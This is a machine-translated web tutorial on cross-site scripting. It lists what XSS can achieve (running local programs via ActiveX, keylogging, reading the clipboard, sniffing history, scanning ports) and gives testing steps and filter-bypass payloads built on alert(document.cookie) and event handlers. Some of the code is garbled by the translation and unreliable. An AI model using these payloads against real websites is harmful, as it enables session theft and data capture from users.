Cross-site scripting (xss) Resolution (iii) xss Vulnerability

Previous: http://www.bkjia.com/Article/201209/153274.html

1. Attackers can exploit the xss vulnerability to call local programs (under IE ). Xss attack load: <script> var o = new ActiveXObject ('wscript. shell '); o.run('calc.exe'); </script> This js Code can call a local calculator program in the IE browser.

2. Attackers can exploit the xss vulnerability to obtain the attacker's key record in the browser. The js Code is as follows: <script> document. onkeypress = function () {window. status + = String. fromCharCode (window. event. keyCode) ;}</script> IE will display the status in the status bar. Non-IE kernel browsers will not display the status, but will save it in the status.

3. Attackers can exploit the xss vulnerability to obtain the content of the clipboard. Js Code <script> alert (window. clipboardData. getData ('text'); </script>, this statement is a pop-up window. Of course, we can save it in a variable and send it to the machine controlled by attackers.

4. the xss vulnerability allows attackers to steal history records and search and query records. Attackers can dynamically create frequently-used web sites and search engine hyperlinks, and use the getComputedStyle API to check whether these links are marked as "accessed" in color to steal private information.

5. by exploiting the xss vulnerability, attackers can enumerate the applications currently used by attackers. Js can be used to determine whether a user is currently logged on to a third-party web application.

6. Attackers can exploit the xss vulnerability to scan the port of the attacker's local network. Js can be used to scan the ports of hosts in the local network to determine the services that can be used. Www.2cto.com

How to find xss vulnerabilities: the basic method is to use the following string> <script> alert (document. cookie) </script>, submit the string to the parameters on the application page, and monitor its response. If the string appears in the response as is, it can be almost determined that the program has an xss vulnerability.

Many WEB programs filter user input to avoid xss attacks. For example, filter <script> expressions and encode the expressions. In this case, we do not use <script> tags, or even <> and/, which are frequently filtered characters, you can also exploit the xss vulnerability. If the application filters <script> strings, we can try the following statement ① "> <script> alert (document. cookie) </script> ② "> <ScRiPt> alert (document. cookie) </ScRiPt> ③ "% 3e % 3 cscript % 3 ealert (document. cookie) % 3c/script % 3e ④ "> <scr <script> ERT> alert (document. cookie) </scr </script> EPT> ⑤ % 00 "> <script> alert (document. cookie) </script>

1. Search for and use reflected xss vulnerabilities. Penetration Test Procedure: ① Select a unique string in the Program (containing only letters) ② submit this string to the application, using it as each parameter on each page, each time only for one parameter. ③ View the application response. Record parameters replaced by this string, which need to be studied in depth. ④ Test all get and post methods. After recording the replaced parameters, you must manually analyze them. For example, a page contains the Code <input type = "text" name = "yeetrack.com" value = "hello world">. hello world is the data read from the client, the xss method is generally to terminate double quotation marks of strings in advance, end the input tag, and then use various methods (<script>, <image src = "javascript :..... ">) , "> <Script> alert (document. cookie) </script> <! -

If the program filters the script keyword, we can also "onfocus =" alert (document. cookie) "; Use the onfocus method to embed js statements. Another example is: the page contains <script> var a = 'Hello world'; B = 'some ';...... </Script>, hello world comes from user input. We can construct the input '; alert (document. cookie); var tem = '. In this way, variable a is closed and a js statement is added. Finally, the variable tem ensures the correctness of the syntax, you can also use // to comment out the following statements. The server has the following code: . We can construct the input javascript: alert {document. cookie}; if you want to launch an attack, you can use "onerror =" alert (document. cookie) ", so if the image fails to be loaded, the statement in onerror will be executed.